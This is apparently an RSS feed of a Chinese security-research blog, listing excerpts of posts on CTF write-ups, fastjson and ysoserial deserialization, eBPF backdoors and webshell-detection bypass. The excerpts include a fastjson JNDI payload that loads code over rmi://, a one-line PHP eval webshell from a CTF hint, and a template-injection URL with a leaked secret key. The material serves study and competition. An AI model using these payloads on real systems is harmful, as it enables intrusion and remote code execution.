rmb122's notebookhttps://rmb122.com/Recent content on rmb122's notebookHugozh-cnrmb122Wed, 12 Nov 2025 22:09:55 +0800XcodeGhost in 2025https://rmb122.com/2025/11/12/xcodeghost-in-2025/Wed, 12 Nov 2025 22:09:55 +0800https://rmb122.com/2025/11/12/xcodeghost-in-2025/<h2 id="背景">背景</h2> <p>在上网冲浪时, 发现一篇文章提到了 XcodeGhost. 想起之前只是了解了大概, 就又去仔细搜索了下 XcodeGhost 事件的细节, 发现 <code>icloud-analysis.com</code> 这个域名目前居然是无主状态, 于是有了接下来的故事.</p>利用 eBPF 技术配合 http 服务实现隐藏后门程序https://rmb122.com/2024/11/01/%E5%88%A9%E7%94%A8-eBPF-%E6%8A%80%E6%9C%AF%E9%9A%90%E8%97%8F%E5%90%8E%E9%97%A8%E7%A8%8B%E5%BA%8F/Fri, 01 Nov 2024 21:38:06 +0800https://rmb122.com/2024/11/01/%E5%88%A9%E7%94%A8-eBPF-%E6%8A%80%E6%9C%AF%E9%9A%90%E8%97%8F%E5%90%8E%E9%97%A8%E7%A8%8B%E5%BA%8F/<h2 id="背景">背景</h2> <p>eBPF 作为 Linux 内核的一个功能, 目前已经被广泛运用在各个发行版中. 比如 systemd 就用了 eBPF 来<a href="proxy.php?url=https://github.com/systemd/systemd/blob/main/src/core/bpf/restrict_fs/restrict-fs.bpf.c" title="" rel="noopener nofollow noreferrer" target="_blank" >限制服务的权限</a>, 可以运行 <code>bpftool prog list</code> 来查看当前加载的 eBPF 程序, 大概率会出现一堆 systemd 加载的 eBPF 程序.</p> <p>eBPF 程序运行在内核的虚拟机中, 很难不让人想到可以拿来作为 rootkit 用, 事实上目前已经有了很多开源 eBPF rootkit, 比如<a href="proxy.php?url=https://github.com/Gui774ume/ebpfkit" title="" rel="noopener nofollow noreferrer" target="_blank" >TripleCross</a>和<a href="proxy.php?url=https://github.com/h3xduck/TripleCross" title="" rel="noopener nofollow noreferrer" target="_blank" >ebpfkit</a>, 可以实现大部分 rootkit 的功能. 但是目前的 eBPF rootkit 都需要额外启动一个用户态程序来实现命令执行功能. 这样 eBPF 程序只用于隐藏自身和下发命令, 执行命令则完全依靠长期运行的用户态程序.</p>Burpsuite 特征识别及其对抗措施https://rmb122.com/2022/08/14/burpsuite-%E7%89%B9%E5%BE%81%E8%AF%86%E5%88%AB%E5%8F%8A%E5%85%B6%E5%AF%B9%E6%8A%97%E6%8E%AA%E6%96%BD/Sun, 14 Aug 2022 12:26:13 +0800https://rmb122.com/2022/08/14/burpsuite-%E7%89%B9%E5%BE%81%E8%AF%86%E5%88%AB%E5%8F%8A%E5%85%B6%E5%AF%B9%E6%8A%97%E6%8E%AA%E6%96%BD/<p>某日, 我的同学突然 @crane 问我有没有能检测 burp 的方法. 突然想起来之前就看见过别人的 burp 被拦截, 但是当时测试下来由于我的 burp 不会被拦截, 所以就没有太在意. 现在回想起来有点在意为什么会出现这种检测上的选择性, 于是刚好学习一下相关方法了解原因.</p>利用项目配置文件进行 RCE - IDE Trust Project 功能探究https://rmb122.com/2021/10/02/%E5%88%A9%E7%94%A8%E9%A1%B9%E7%9B%AE%E9%85%8D%E7%BD%AE%E6%96%87%E4%BB%B6%E8%BF%9B%E8%A1%8C-RCE-IDE-Trust-Project-%E5%8A%9F%E8%83%BD%E6%8E%A2%E7%A9%B6/Sat, 02 Oct 2021 20:43:33 +0000https://rmb122.com/2021/10/02/%E5%88%A9%E7%94%A8%E9%A1%B9%E7%9B%AE%E9%85%8D%E7%BD%AE%E6%96%87%E4%BB%B6%E8%BF%9B%E8%A1%8C-RCE-IDE-Trust-Project-%E5%8A%9F%E8%83%BD%E6%8E%A2%E7%A9%B6/<p>最近发现在打开 IDEA, VSCode 项目时候, 都增加了 &ldquo;信任此项目的提示&rdquo;. 结合这些 IDE 的特点, 确实可能存在在打开项目时产生 RCE 的风险, 特别是进行代码审计的安全人员, 会经常打开未知的项目. 正常人肯定不会贸然的执行未知的代码, 但是对于打开项目时这个弹出的框框, 可能并不会特别在意. 接下来分析一些通过这些配置来进行 RCE 的方法.</p>hxp CTF resonator Writeup - SSRF via file_put_contentshttps://rmb122.com/2020/12/30/hxp-CTF-resonator-Writeup-SSRF-via-file-put-contents/Wed, 30 Dec 2020 15:02:46 +0000https://rmb122.com/2020/12/30/hxp-CTF-resonator-Writeup-SSRF-via-file-put-contents/<h2 id="题目简介">题目简介</h2> <p>在刚结束的 hxpCTF 中出现了一题跟 🍊 的 One line php challenge 一样短小精悍但非常有趣的题目. 长度只有五行,</p>2020 CISCN 华东北赛区 WEB Writeuphttps://rmb122.com/2020/09/19/2020-CISCN-%E5%8D%8E%E4%B8%9C%E5%8C%97%E8%B5%9B%E5%8C%BA-WEB-Writeup/Sat, 19 Sep 2020 22:14:55 +0000https://rmb122.com/2020/09/19/2020-CISCN-%E5%8D%8E%E4%B8%9C%E5%8C%97%E8%B5%9B%E5%8C%BA-WEB-Writeup/<p>一共 6 题 WEB, 我一个人拿了 4 个一血, 还有一题全场 0 解. 然而没有 pwn 爷爷依旧被吊打, 而且题目质量是真的差, 明年再打国赛我是傻逼.</p>DDCTF 2020 Writeuphttps://rmb122.com/2020/09/07/DDCTF-2020-Writeup/Mon, 07 Sep 2020 21:48:48 +0000https://rmb122.com/2020/09/07/DDCTF-2020-Writeup/<p>今年改了赛制, 可以两人组队, 我觉得改的还是不错的, 终于不用现场表演学习逆向和 pwn 了, 成功和 Ary 师傅打到了第三 233</p>TCTF/0CTF 2020 Writeuphttps://rmb122.com/2020/06/29/TCTF-0CTF-2020-Writeup/Mon, 29 Jun 2020 19:49:05 +0000https://rmb122.com/2020/06/29/TCTF-0CTF-2020-Writeup/<p>又是一年 0CTF, 这次一个人一队单刷一次, 做出了两题 WEB, 可惜只输出了一天, 第二天还要赶 ddl, 还是太蔡了 orz</p>fastjson 1.2.68 反序列化漏洞 gadgets 挖掘笔记https://rmb122.com/2020/06/12/fastjson-1-2-68-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E-gadgets-%E6%8C%96%E6%8E%98%E7%AC%94%E8%AE%B0/Fri, 12 Jun 2020 22:15:32 +0000https://rmb122.com/2020/06/12/fastjson-1-2-68-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E-gadgets-%E6%8C%96%E6%8E%98%E7%AC%94%E8%AE%B0/<p>以此祭奠找 gadgets 逝去的青春, orz</p>Codeql 踩坑记录 (二)https://rmb122.com/2020/03/31/Codeql-%E8%B8%A9%E5%9D%91%E8%AE%B0%E5%BD%95-%E4%BA%8C/Tue, 31 Mar 2020 23:06:52 +0000https://rmb122.com/2020/03/31/Codeql-%E8%B8%A9%E5%9D%91%E8%AE%B0%E5%BD%95-%E4%BA%8C/<p>首先需要解决的就是上次留下的问题, 添加自定义的 taint track.<br> 在自带的 tests 中就有示例, 可以参考 <code>ql/python/ql/test/library-tests/taint/extensions/ExtensionsLib.qll</code></p>Codeql 踩坑记录https://rmb122.com/2020/03/30/Codeql-%E8%B8%A9%E5%9D%91%E8%AE%B0%E5%BD%95/Mon, 30 Mar 2020 23:24:40 +0000https://rmb122.com/2020/03/30/Codeql-%E8%B8%A9%E5%9D%91%E8%AE%B0%E5%BD%95/<h2 id="安装">安装</h2> <p>入口: <a href="proxy.php?url=https://help.semmle.com/codeql/codeql-cli/procedures/get-started.html" title="" rel="noopener nofollow noreferrer" target="_blank" >https://help.semmle.com/codeql/codeql-cli/procedures/get-started.html</a><br> 下载地址: <a href="proxy.php?url=https://github.com/github/codeql-cli-binaries/releases" title="" rel="noopener nofollow noreferrer" target="_blank" >https://github.com/github/codeql-cli-binaries/releases</a><br> license: <a href="proxy.php?url=https://securitylab.github.com/tools/codeql/license" title="" rel="noopener nofollow noreferrer" target="_blank" >https://securitylab.github.com/tools/codeql/license</a></p>fastjson RCE 分析https://rmb122.com/2020/02/01/fastjson-RCE-%E5%88%86%E6%9E%90/Sat, 01 Feb 2020 18:18:25 +0000https://rmb122.com/2020/02/01/fastjson-RCE-%E5%88%86%E6%9E%90/<h2 id="简介">简介</h2> <p>先看经典 payload</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1</span><span>{<span style="color:#ff79c6">&#34;@type&#34;</span>:<span style="color:#f1fa8c">&#34;com.sun.rowset.JdbcRowSetImpl&#34;</span>,<span style="color:#ff79c6">&#34;dataSourceName&#34;</span>:<span style="color:#f1fa8c">&#34;rmi://localhost:1099/Exploit&#34;</span>,<span style="color:#ff79c6">&#34;autoCommit&#34;</span>:<span style="color:#ff79c6">true</span>} </span></span></code></pre></div>ysoserial URLDNS, CommonsCollectionsX 分析https://rmb122.com/2020/01/20/ysoserial-URLDNS-CommonsCollectionsX-%E5%88%86%E6%9E%90/Mon, 20 Jan 2020 17:45:51 +0000https://rmb122.com/2020/01/20/ysoserial-URLDNS-CommonsCollectionsX-%E5%88%86%E6%9E%90/<p>之前都是 ysoserial 一把梭, 还是得学习 + 复现一下内部实现机制的.</p>2019 高校运维 ezcms 复现https://rmb122.com/2020/01/13/2019-%E9%AB%98%E6%A0%A1%E8%BF%90%E7%BB%B4-ezcms-%E5%A4%8D%E7%8E%B0/Mon, 13 Jan 2020 00:04:55 +0000https://rmb122.com/2020/01/13/2019-%E9%AB%98%E6%A0%A1%E8%BF%90%E7%BB%B4-ezcms-%E5%A4%8D%E7%8E%B0/<p>之前高校运维碰到的题目, 当时就我一个人输出 web + 自己太菜了, 就没做出来 _(:3」∠)_, 寒假有时间看看, 复现一下题目.</p>OGeek 线下 Java Web And XCTF Final babytaint Writeuphttps://rmb122.com/2019/10/31/OGeek-%E7%BA%BF%E4%B8%8B-Java-Web-And-XCTF-Final-babytaint-Writeup/Thu, 31 Oct 2019 22:37:15 +0000https://rmb122.com/2019/10/31/OGeek-%E7%BA%BF%E4%B8%8B-Java-Web-And-XCTF-Final-babytaint-Writeup/<p>因为最近课程非常非常多, 还顺带考试 + 实验报告, 咕咕咕掉了许多比赛, 真正去的也只有 OGeek, 其他都是云比赛.<br> 拿做出来的题目里面选两题写个 Writeup 吧, 不然太久没更新了 (逃</p>Ogeek Easy Realworld Challenge 1&2 Writeuphttps://rmb122.com/2019/08/28/Ogeek-Easy-Realworld-Challenge-1-2-Writeup/Wed, 28 Aug 2019 09:58:59 +0000https://rmb122.com/2019/08/28/Ogeek-Easy-Realworld-Challenge-1-2-Writeup/<p>这次 Ogeek 的 web 都挺有意思. 这两题偏向代码审计, 而且如题目名 <code>Easy Realworld</code>, 都是审计应用本身的漏洞, 差不多就是找 0day 了, 在这里分享给大家.</p>深入理解字符编码以及 GBK 注入https://rmb122.com/2019/08/06/%E6%B7%B1%E5%85%A5%E7%90%86%E8%A7%A3%E5%AD%97%E7%AC%A6%E7%BC%96%E7%A0%81/Tue, 06 Aug 2019 16:13:47 +0000https://rmb122.com/2019/08/06/%E6%B7%B1%E5%85%A5%E7%90%86%E8%A7%A3%E5%AD%97%E7%AC%A6%E7%BC%96%E7%A0%81/<p>以前对 UTF-8, UTF-16, unicode, GBK, ASCII 之类的都是一知半解, 其实深入之后了解这些并不困难.</p>PHP 扩展学习https://rmb122.com/2019/07/31/PHP-%E6%89%A9%E5%B1%95%E5%AD%A6%E4%B9%A0/Wed, 31 Jul 2019 17:11:21 +0000https://rmb122.com/2019/07/31/PHP-%E6%89%A9%E5%B1%95%E5%AD%A6%E4%B9%A0/<p>PHP 类似于 python 也是运行在解释器上的, PHP 的叫 zend, python 的叫 cpython,<br> 这些都是官方实现, 像 python 也有 jython, pypy 啥的, 用其他语言写的解释器.</p>利用 PHP Trait 特性绕过 D 盾查杀https://rmb122.com/2019/07/25/%E5%88%A9%E7%94%A8-PHP-Trait-%E7%89%B9%E6%80%A7%E7%BB%95%E8%BF%87-D-%E7%9B%BE%E6%9F%A5%E6%9D%80/Thu, 25 Jul 2019 15:14:14 +0000https://rmb122.com/2019/07/25/%E5%88%A9%E7%94%A8-PHP-Trait-%E7%89%B9%E6%80%A7%E7%BB%95%E8%BF%87-D-%E7%9B%BE%E6%9F%A5%E6%9D%80/<p>帮着公司审着代码, 发现一个 PHP 挺好玩的特性, 突发奇想, 想看看能不能绕 D 盾, 没想到就成了.</p>CyBRICS CTF Samizdat Writeuphttps://rmb122.com/2019/07/22/CyBRICS-CTF-Samizdat-Writeup/Mon, 22 Jul 2019 09:56:31 +0000https://rmb122.com/2019/07/22/CyBRICS-CTF-Samizdat-Writeup/<p>这题是在比赛结束后才做出来的, 比较可惜, 但是题目本身还是比较有意思的, 所以写个 Writeup.<br> (早知道早点起床做题了</p>RCTF2019 baby_crypto & baby_aeshttps://rmb122.com/2019/05/22/RCTF2019-baby-crypto-baby-aes-Writeup/Wed, 22 May 2019 17:51:21 +0000https://rmb122.com/2019/05/22/RCTF2019-baby-crypto-baby-aes-Writeup/<p>密码学只做出来两题 baby, 暗示我还是学密码学的 baby (逃</p>自制一个简单的 Hashpumphttps://rmb122.com/2019/05/11/%E8%87%AA%E5%88%B6%E4%B8%80%E4%B8%AA%E7%AE%80%E5%8D%95%E7%9A%84-Hashpump/Sat, 11 May 2019 00:02:02 +0000https://rmb122.com/2019/05/11/%E8%87%AA%E5%88%B6%E4%B8%80%E4%B8%AA%E7%AE%80%E5%8D%95%E7%9A%84-Hashpump/<p>在学完 MD5/SHA1 之后, 很快就能搞懂 <code>hashpump</code> 的原理, 本质是因为类 <code>MD</code> 哈希函数<br> 包括 MD5, SHA1, SHA2 都是将信息填充为一个 <code>Block</code> 长度的倍数以后分 <code>Block</code> 一轮轮计算的,<br> 最后输出的是寄存器拼接在一起的值, 所以假设用以下公式计算签名</p>Ciscn 2019 初赛 Writeuphttps://rmb122.com/2019/04/25/Ciscn-2019-%E5%88%9D%E8%B5%9B-Writeup/Thu, 25 Apr 2019 00:23:14 +0000https://rmb122.com/2019/04/25/Ciscn-2019-%E5%88%9D%E8%B5%9B-Writeup/<p>输出了两题 web + 一题 crypto, 太菜了 QAQ<br> 因为也是要交上去的, 就写的比较简单了.</p>DDCTF2019 Writeuphttps://rmb122.com/2019/04/25/DDCTF2019-Writeup/Thu, 25 Apr 2019 00:17:49 +0000https://rmb122.com/2019/04/25/DDCTF2019-Writeup/<p>历时 N 天, 滴滴终于审完了 Writeup, 终于可以发 wp 了, 我从 33 名到 16 名, 太真实了&hellip;<br> 部分题目质量还是不错的 _(:з」∠)_, 因为要交上去, 所以就没截图了, 凑合看吧 (逃</p>干掉 PHP 不死马https://rmb122.com/2019/04/04/%E5%B9%B2%E6%8E%89-PHP-%E4%B8%8D%E6%AD%BB%E9%A9%AC/Thu, 04 Apr 2019 23:20:56 +0000https://rmb122.com/2019/04/04/%E5%B9%B2%E6%8E%89-PHP-%E4%B8%8D%E6%AD%BB%E9%A9%AC/<p>在 AWD 模式下经常碰到不死马, 不干掉的话就会一直被偷 flag, 很难受. 所以研究一下怎么干掉.</p>0ctf Wallbreaker Easy Writeuphttps://rmb122.com/2019/03/26/0ctf-Wallbreaker-Easy-Writeup/Tue, 26 Mar 2019 16:06:31 +0000https://rmb122.com/2019/03/26/0ctf-Wallbreaker-Easy-Writeup/<p>本文首发于<a href="proxy.php?url=https://xz.aliyun.com/t/4589" title="" rel="noopener nofollow noreferrer" target="_blank" >先知</a></p> <p>周末打了两天, 自闭 web 狗就做出来这一题, 另一题不知道调用啥 mbean 能拿 shell. 总之题目质量真的是非常高, 学到了很多.</p> <h2 id="描述">描述</h2> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-mysql" data-lang="mysql"><span style="display:flex;"><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1</span><span>Imagick <span style="color:#ff79c6">is</span> a awesome library <span style="color:#ff79c6">for</span> hackers <span style="color:#ff79c6">to</span> break <span style="color:#ff79c6">`</span>disable_functions<span style="color:#ff79c6">`</span>. </span></span><span style="display:flex;"><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">2</span><span>So I installed php<span style="color:#ff79c6">-</span>imagick <span style="color:#ff79c6">in</span> the server, opened a <span style="color:#ff79c6">`</span>backdoor<span style="color:#ff79c6">`</span> <span style="color:#ff79c6">for</span> you. </span></span><span style="display:flex;"><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">3</span><span>Let<span style="color:#f1fa8c">&#39;s try to execute `/readflag` to get the flag. </span></span></span><span style="display:flex;"><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">4</span><span><span style="color:#f1fa8c">Open basedir: /var/www/html:/tmp/949c1400c8390865cb5939a106fec0b6 </span></span></span><span style="display:flex;"><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">5</span><span><span style="color:#f1fa8c">Hint: eval($_POST[&#34;backdoor&#34;]); </span></span></span></code></pre></div>从一道 CTF 题了解密码学中的 Meet-in-the-middle 攻击https://rmb122.com/2019/03/25/%E4%BB%8E%E4%B8%80%E9%81%93-CTF-%E9%A2%98%E4%BA%86%E8%A7%A3%E5%AF%86%E7%A0%81%E5%AD%A6%E4%B8%AD%E7%9A%84-Meet-in-the-middle-%E6%94%BB%E5%87%BB/Mon, 25 Mar 2019 23:26:21 +0000https://rmb122.com/2019/03/25/%E4%BB%8E%E4%B8%80%E9%81%93-CTF-%E9%A2%98%E4%BA%86%E8%A7%A3%E5%AF%86%E7%A0%81%E5%AD%A6%E4%B8%AD%E7%9A%84-Meet-in-the-middle-%E6%94%BB%E5%87%BB/<p>本文首发于<a href="proxy.php?url=https://xz.aliyun.com/t/4056" title="" rel="noopener nofollow noreferrer" target="_blank" >先知</a></p> <p>在家里无聊打了 nullcon, 其中有一题用到了 <code>Meet-in-the-middle</code> 这种攻击方式,<br> 在这里分享给大家.</p>Hgame Writeuphttps://rmb122.com/2019/03/09/Hgame-Writeup/Sat, 09 Mar 2019 00:45:02 +0000https://rmb122.com/2019/03/09/Hgame-Writeup/<h2 id="happypython">happyPython</h2> <p>随便 fuzz 一下发现 404 页面有模板注入, http://118.25.18.223:3001/asd%7B%7Bconfig%7D%7D.<br> 拿到 <code>'SECRET_KEY': '9RxdzNwq7!nOoK3*'</code>, 把 session 里的 user_id 改成 <code>1</code> 就行了. <img src="proxy.php?url=https://i.loli.net/2019/03/21/5c93a6120d105.png#center" alt="" referrerpolicy="no-referrer"></p> <p><img src="proxy.php?url=https://i.loli.net/2019/03/21/5c93a611dc09d.png#center" alt="" referrerpolicy="no-referrer"></p>Padding Oracle + CBC 字节翻转学习https://rmb122.com/2019/02/21/Padding-Oracle--CBC-%E5%AD%97%E8%8A%82%E7%BF%BB%E8%BD%AC%E5%AD%A6%E4%B9%A0/Thu, 21 Feb 2019 17:04:38 +0000https://rmb122.com/2019/02/21/Padding-Oracle--CBC-%E5%AD%97%E8%8A%82%E7%BF%BB%E8%BD%AC%E5%AD%A6%E4%B9%A0/<p>之前一直就很想了解的技术, 这次同样是在 <a href="proxy.php?url=https://hgame.vidar.club/" title="" rel="noopener nofollow noreferrer" target="_blank" >hgame</a> 上碰到, 刚好从<a href="proxy.php?url=http://xnianq.cn/2017/07/26/padding-oracle" title="" rel="noopener nofollow noreferrer" target="_blank" >师傅</a>那里学习一下, 更详细的可以去看 <a href="proxy.php?url=https://en.wikipedia.org/wiki/Padding_oracle_attack" title="" rel="noopener nofollow noreferrer" target="_blank" >wiki</a>.</p> <p>简单来讲就是通过服务器对 Padding 正确和错误返回的不同状态, 来猜解所谓的<code>中间值</code>, 从而达成解密数据, 伪造数据.</p>DNS Rebind 在 SSRF 中的作用https://rmb122.com/2019/02/21/DNS-Rebind-%E5%9C%A8-SSRF-%E4%B8%AD%E7%9A%84%E4%BD%9C%E7%94%A8/Thu, 21 Feb 2019 16:34:34 +0000https://rmb122.com/2019/02/21/DNS-Rebind-%E5%9C%A8-SSRF-%E4%B8%AD%E7%9A%84%E4%BD%9C%E7%94%A8/<p>这几天沉迷 <a href="proxy.php?url=https://hgame.vidar.club/" title="" rel="noopener nofollow noreferrer" target="_blank" >hgame</a>, 题目质量还是不错的, 其中有一题用到了 DNS rebind, 这里重新记一下笔记. 因为我估计也没多少人看我博客 233, 就直接写了, 不等比赛结束了.</p>Thinkphp >= 5.0.23 RCE 分析https://rmb122.com/2019/01/16/Thinkphp-%E7%89%88%E6%9C%AC%E5%B0%8F%E4%BA%8E-5.0.23-RCE-%E5%88%86%E6%9E%90/Wed, 16 Jan 2019 19:03:53 +0000https://rmb122.com/2019/01/16/Thinkphp-%E7%89%88%E6%9C%AC%E5%B0%8F%E4%BA%8E-5.0.23-RCE-%E5%88%86%E6%9E%90/<p>起因是刚出来那天刚好有个站是 5.0.23 但是分析文章没给完整的截图, 打了码. 干脆自己分析一波写写 poc.</p> <p><img src="proxy.php?url=https://i.loli.net/2019/03/08/5c827b967b058.jpg#center" alt="" referrerpolicy="no-referrer"></p>PHP 支持的各种协议学习https://rmb122.com/2019/01/04/PHP-%E6%94%AF%E6%8C%81%E7%9A%84%E5%90%84%E7%A7%8D%E5%8D%8F%E8%AE%AE%E5%AD%A6%E4%B9%A0/Fri, 04 Jan 2019 18:27:17 +0000https://rmb122.com/2019/01/04/PHP-%E6%94%AF%E6%8C%81%E7%9A%84%E5%90%84%E7%A7%8D%E5%8D%8F%E8%AE%AE%E5%AD%A6%E4%B9%A0/<p>PHP 支持了不少协议, 特别是其中的 <code>php://</code> 和 <code>phar://</code> 经常能在意想不到的地方发挥意想不到的作用 233. 之前都是花式百度, 这次系统学习一下. 所有的协议都可以在<a href="proxy.php?url=http://php.net/manual/en/wrappers.php" title="" rel="noopener nofollow noreferrer" target="_blank" >官网</a>上找到.</p> <p>这些协议一般配合 <code>file_get_contents</code>, <code>include</code> 使用, 部分情况下受到 php.ini 里面的 <code>allow_url_fopen</code>(默认开启) 和 <code>allow_url_include</code>(默认关闭) 限制. 如果 <code>allow_url_include</code> 开启的话, 是非常危险的, 可能存在远程文件包含.</p>C1CTF 2018 Writeuphttps://rmb122.com/2018/12/12/c1ctf-2018-writeup/Wed, 12 Dec 2018 21:57:13 +0000https://rmb122.com/2018/12/12/c1ctf-2018-writeup/<h2 id="misc">Misc</h2> <h3 id="0x01-签到">0x01 签到</h3> <p>base64 解码一下就行, 不懂的同学可以看一下<a href="proxy.php?url=https://www.rmb122.cn/index.php/2018/04/26/base64-%E7%BC%96%E7%A0%81%E5%8E%9F%E7%90%86%E8%AF%A6%E8%A7%A3/" title="" rel="noopener nofollow noreferrer" target="_blank" >这个</a></p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-fallback" data-lang="fallback"><span style="display:flex;"><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1</span><span>$ base64 -d </span></span><span style="display:flex;"><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">2</span><span>QzFDVEZ7dzNsZWMwbWVfdE9fQzFDVEZ9 </span></span><span style="display:flex;"><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">3</span><span>C1CTF{w3lec0me_tO_C1CTF} </span></span></code></pre></div>HCTF2018 WriteUphttps://rmb122.com/2018/11/12/hctf2018-writeup/Mon, 12 Nov 2018 00:18:29 +0000https://rmb122.com/2018/11/12/hctf2018-writeup/<p><img src="proxy.php?url=https://i.loli.net/2019/03/08/5c82768fe4d67.jpg#center" alt="" referrerpolicy="no-referrer"><br> 和师傅们肝了两天, 最后排名 25, 看看一堆没做出来的题, 感到自己深深的菜&hellip;</p>开发一个简单的 Chrome 拓展https://rmb122.com/2018/06/14/%E5%BC%80%E5%8F%91%E4%B8%80%E4%B8%AA%E7%AE%80%E5%8D%95%E7%9A%84-Chrome-%E6%8B%93%E5%B1%95/Thu, 14 Jun 2018 00:42:47 +0000https://rmb122.com/2018/06/14/%E5%BC%80%E5%8F%91%E4%B8%80%E4%B8%AA%E7%AE%80%E5%8D%95%E7%9A%84-Chrome-%E6%8B%93%E5%B1%95/<p>每次复制域名时都会被 Chrome 复制地址时的 <code>https://</code> 烦到, 所以干脆自己写个拓展来解决这个问题. Chrome 拓展其实就是一个小网页, 也就是 HTML, 所以我们可以用 JavaScript 来实现获取域名和复制的操作. 具体实现如下.</p>base64 编码原理详解https://rmb122.com/2018/04/26/base64-%E7%BC%96%E7%A0%81%E5%8E%9F%E7%90%86%E8%AF%A6%E8%A7%A3/Thu, 26 Apr 2018 08:22:44 +0000https://rmb122.com/2018/04/26/base64-%E7%BC%96%E7%A0%81%E5%8E%9F%E7%90%86%E8%AF%A6%E8%A7%A3/<p>之前一直都是直接无脑</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1</span><span><span style="color:#ff79c6">from</span> base64 <span style="color:#ff79c6">import</span> b64encode <span style="color:#ff79c6">as</span> b64e </span></span></code></pre></div><p>只知道大概 base64 是啥东西, 今天突然心血来潮花了几分钟了解了下 base64, 其实原理并不复杂.</p>牛顿迭代法求平方根https://rmb122.com/2018/01/31/%E7%89%9B%E9%A1%BF%E8%BF%AD%E4%BB%A3%E6%B3%95%E6%B1%82%E5%B9%B3%E6%96%B9%E6%A0%B9/Wed, 31 Jan 2018 19:57:48 +0000https://rmb122.com/2018/01/31/%E7%89%9B%E9%A1%BF%E8%BF%AD%E4%BB%A3%E6%B3%95%E6%B1%82%E5%B9%B3%E6%96%B9%E6%A0%B9/<p>牛顿法可以求一些非线性方程的近似解. 而对于求平方根,  可以将 $y = \sqrt{x}$ 化成方程 $x^2 - a = 0$ 中求 $x$ 的值, $x$ 即为 $a$ 的开根号, 根据牛顿法定义, 可以写出以下程序</p>RSA 加密及解密https://rmb122.com/2017/11/24/RSA-%E5%8A%A0%E5%AF%86%E5%8F%8A%E8%A7%A3%E5%AF%86/Fri, 24 Nov 2017 16:55:26 +0000https://rmb122.com/2017/11/24/RSA-%E5%8A%A0%E5%AF%86%E5%8F%8A%E8%A7%A3%E5%AF%86/<p>对于解题来说 一般会给你以下信息:模数N、公钥E和密文C. 如果只是做题的话</p>